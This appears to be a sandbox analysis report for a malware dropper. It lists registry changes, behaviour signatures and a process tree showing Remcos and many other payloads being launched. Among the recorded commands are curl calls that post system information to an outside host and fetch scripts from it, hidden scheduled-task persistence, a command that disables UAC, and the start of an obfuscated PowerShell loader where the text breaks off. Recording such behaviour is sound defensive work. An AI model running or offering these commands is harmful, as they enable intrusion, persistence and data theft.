| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\onefile_1664_133785010349282403\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\7YCBIE37YCBA" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7990.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7990.tmp.bat
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1296
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp8104.tmp"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1800 -ip 1800
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\10000520110\123719821238.dll, Main
C:\Users\Admin\AppData\Local\Temp\bbvlnu.exe
"C:\Users\Admin\AppData\Local\Temp\bbvlnu.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
"C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JKDOUiagHrSJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$umeyVVLDGToceF,[Parameter(Position=1)][Type]$ZrAdVhcZsG)$fVXKhXXHDLa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType(''+'M'+'y'+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'at'+[Char](101)+''+'T'+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'la'+'s'+''+'s'+''+[Char](44)+''+'A'+'